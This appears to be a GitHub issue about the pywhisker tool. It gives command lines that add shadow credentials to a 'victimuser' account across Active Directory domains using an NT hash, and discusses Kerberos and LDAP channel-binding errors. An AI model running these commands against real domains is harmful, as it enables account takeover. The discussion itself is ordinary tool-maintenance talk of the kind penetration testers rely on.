When I need to generate a certificate from domainA.contoso.local to target victimuser in domainB.contoso.local, I use the NT hash for authentication with this command:
python3 pywhisker.py -a add -d domainA.contoso.local -u admin -H :<nthash> -t victimuser -td domainB.contoso.local
All fine.
But in my case LDAP signing + channel binding is enabled on domainB, and I can't authenticate with NTLM, because I get the error strongerAuthRequired.
And when I ask for a ticket for admin@domainA.contoso.local and then use the command:
python3 pywhisker.py -a add -d domainA.contoso.local -u admin -k --dc-ip <dc ip domainB.contoso.local> -t victimuser -td domainB.contoso.local
I get the error KDC_ERR_WRONG_REALM.
I know that this version of ldap3 can solve this problem: https://github.com/ThePirateWhoSmellsOfSunflowers/ldap3/tree/tls_cb_and_seal_for_ntlm
I tried to do it myself, but I couldn't succeed.
I won't be able to add this for the time being (not enough time), but it would be really great if someone would implement the change. I would gladly review & merge, it would be an awesome addition in my opinion (if it doesn't break how the tool currently works of course).